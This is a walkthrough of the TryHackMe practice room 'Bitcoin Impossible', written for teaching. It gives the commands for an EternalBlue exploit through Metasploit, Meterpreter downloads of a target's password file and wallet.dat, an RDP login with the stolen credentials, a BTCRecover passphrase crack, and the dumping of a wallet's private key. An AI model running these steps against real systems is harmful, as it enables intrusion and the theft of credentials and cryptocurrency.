TryHackMe Walkthrough — Bitcoin Impossible
Bitcoin Impossible: https://tryhackme.com/r/room/bitcoinimposible
This is a walkthrough for the TryHackMe room Bitcoin Impossible. The main learning points in this room are interacting with Bitcoin wallets/keys and understanding permutation patterns for password cracking. There are many ways to solve this, but everything done to solve it in this writeup was completed on the TryHackMe attack box: no external computing power was used to crack anything.
In this scenario, you are a hacker tasked by the Government with stopping a devious plot. Hans Gruber, the infamous evil mastermind, plans to crash a Christmas party at Nakatomi Tower. Intelligence has revealed that he’s funding his scheme with Bitcoin. Your mission is to hack into Gruber’s computer and steal the Bitcoin to thwart his plan before it unfolds.
We are provided an IP address from the intercepted communications.
We’ll start by opening terminal and running some recon on the provided IP.
nmap -A <ip-address>
The -A flag is an aggressive scan, providing OS, versions, and a ton of other information. Yea, -A is loud and proud, but YOLO my dude.
The target seems to be rocking Windows 7 (build 7601). That’s a blast from the past.
Some ports worth noting:
- 3389: Remote Desktop Protocol (RDP), your usual suspect.
- 8883: Could be a hint that Bitcoin Core software is in play.
Ah, Mr. Gruber, the proud new owner of a bargain-bin OS picked up from the wilds of the internet. Because nothing says ‘top-notch security’ like ‘free and sketchy.’ Bravo.
There are other open ports that might hold some vulnerabilities, but let’s skip the formalities and go straight for the ace with EternalBlue. Classic, reliable, and just begging to be exploited.
Let’s spin-up Metasploit and get that going to gain access to his computer. In the terminal we’ll enter:
msfconsole
search eternalblue
use 1
set RHOST <ip-address>
exploit
Once we have a shell we can manually explore the machine using:
pwd = displays the current directory
cd <path> = changes to the given directory
cd .. = moves up one directory
dir = displays the contents of the current directory
Poking around on the machine we’ll find all the goods on Gruber’s desktop.
cd C:\Users\Hans Gruber\Desktop
We can dump all the contents to our attack box’s Downloads folder for closer review.
download "C:\Users\Hans Gruber\Desktop" /root/Downloads
The files retrieved are… interesting, to say the least.
First up, we’ve got a .pdf of the Bitcoin whitepaper — looks like Mr. Gruber was brushing up on his crypto knowledge. How quaint.
Then there’s a photo of John McClane. It seems Gruber has some unresolved feelings there — Hate? Obsession? A little of both, perhaps.
Finally, our tour de force a .txt file named pw.txt. It’s basically Gruber’s personal treasure map of accounts and passwords, including the credentials for his Windows login.
Shall we use the RDP application Remmina and pay a little visit to his workstation? Let’s.
Open terminal on the attack box and type
remmina
Start a new RDP connection selecting the plus box in the top left corner of the application.
Enter Gruber’s IP address into the server field, input the Windows username and password, and hit Connect. Simple enough, let’s see what surprises await us!
Select “yes” on the popup to accept the certificates.
As soon as the Windows machine logs in, the Bitcoin Core application conveniently pops up.
Navigating to the “Receive” section reveals a wallet labeled: “Wallet Address for Evil Plan.” Subtle, Gruber.
Opening the wallet displays the address: BC1QYG3H6P0GVHFL205UDJJPUF777A97PC2SFVASUR, a perfect match to the address from the intercepted communications. The wallet appears empty on his machine, but the blockchain hasn’t fully synced, so verifying the address in an online block explorer reveals we’ve found the pot of Bitcoin fueling his nefarious scheme! (Note: the actual Bitcoin has since moved, as the challenge has previously been solved.)
Let’s dump that private key and save Christmas!
In the Bitcoin Core application navigate to “Window” and then select “Console”.
dumpprivkey BC1QYG3H6P0GVHFL205UDJJPUF777A97PC2SFVASUR
and press enter.
We get an error because the wallet is password protected.
We’ll need to pull the wallet.dat file over to our attack box to attempt to crack the passphrase.
Bitcoin Core stores the wallet.dat file in a standard location in a typical install. Let’s hop back over to our Meterpreter session and download the wallet.dat file to our local machine.
Navigate to the wallet folder in Meterpreter:
cd "c:\Users\Hans Gruber\appdata\Roaming\Bitcoin\Wallets"
dir
We can see the Evil Plan wallet listed. Let’s open it up.
cd "evil plan"
dir
We can now see the wallet.dat file listed in the directory.
To pull it over to the attack box enter:
download wallet.dat /root/Downloads
We’ve got our hands on the wallet.dat file, but there’s still the pesky passphrase to crack. A quick look at Gruber’s pw.txt file doesn’t give us the exact passphrase, because of course he couldn’t make it that easy. There are some similar passwords listed, but brute-forcing it with that information alone could take days or even weeks, and we’re on a tighter schedule than that!
After staring at the passwords for a while, a pattern emerges: every single one is some permutation of !!, 88, McClaneSUX, and Hansisboss. Bingo. This revelation drops our possible combinations from millions down to just 64 possibilities. Now we’re in business!
There’s more than one way to crack an egg, or in this case a Bitcoin wallet. We’re going to use a tool called BTCRecover. First we’ll need to download it onto our attack box to assist in the cracking.
Then navigate into the created folder.
cd BTCRecover
We need to create a token list containing the permutations we discovered previously.
nano pwlist.txt
In the document enter:
!!
88
McClaneSUX
Hansisboss
Save the file and let’s fire up BTCRecover!
Each line represents a unique token that will be combined with the others in every possible order to generate all permutations. Using BTCRecover, we will explore all potential combinations: any 1, 2, or 3 of the tokens, or all 4 tokens together, in every order (4 + 12 + 24 + 24). This process will result in a total of 64 possible combinations.
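As an added illustration (not part of the original walkthrough and not BTCRecover’s own code), this Python reproduces the candidate set that the four-line token list above expands to, so you can see exactly why a passphrase built from a handful of reused fragments has such a tiny keyspace. The only inputs are the four tokens already given on this page.

```python
from itertools import permutations
from math import perm

# The four fragments spotted in pw.txt (taken from the walkthrough above).
TOKENS = ["!!", "88", "McClaneSUX", "Hansisboss"]


def token_permutations(tokens):
    """Return every passphrase formed by concatenating 1..len(tokens)
    distinct tokens in any order, which is what a tokenlist of
    optional, order-free tokens expands to."""
    candidates = []
    for r in range(1, len(tokens) + 1):
        for combo in permutations(tokens, r):
            candidates.append("".join(combo))
    return candidates


def keyspace_size(n):
    """Number of ordered selections of 1..n distinct items:
    sum over r of n! / (n - r)!  (for n = 4 this is 4+12+24+24 = 64)."""
    return sum(perm(n, r) for r in range(1, n + 1))


def candidate_rank(tokens, passphrase):
    """1-based position of a passphrase in the generated list, or 0 if
    the token pattern would never produce it (useful for sanity-checking
    a suspected pattern before spending any cracking time on it)."""
    for i, cand in enumerate(token_permutations(tokens), start=1):
        if cand == passphrase:
            return i
    return 0


if __name__ == "__main__":
    cands = token_permutations(TOKENS)
    print(f"{len(cands)} candidates (formula says {keyspace_size(len(TOKENS))})")
    print("rank of 88McClaneSUX!!:", candidate_rank(TOKENS, "88McClaneSUX!!"))
```

Compare the 64 candidates here with the roughly 7 x 10^22 strings of the same 14-character length drawn from a full printable alphabet; the pattern, not the length, is what made this passphrase crackable in seconds.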
We’ll start the program and set the wallet flag to point to the location of the wallet.dat file. Then, use the token list flag to reference the list of possible passphrase combinations we just created. Let’s see if we can crack this thing wide open!
python3 btcrecover.py --wallet '/root/Downloads/wallet.dat' --tokenlist pwlist.txt
And just like that — boom! We’ve got it in no time at all.
Password found: '88McClaneSUX!!'
To skip the hassle of downloading Bitcoin Core and importing the wallet locally, let’s head back to the Remmina instance. Open Bitcoin Core on Gruber’s machine, navigate to the console, and take control directly from there.
Now we’ll enter:
walletpassphrase 88McClaneSUX!! 600
This will unlock the wallet for 600 seconds, aka 10 minutes.
Then we’ll type:
dumpprivkey BC1QYG3H6P0GVHFL205UDJJPUF777A97PC2SFVASUR
Success! The private key to the Bitcoin address is revealed — and as a bonus, it doubles as the flag for the challenge. Mission accomplished!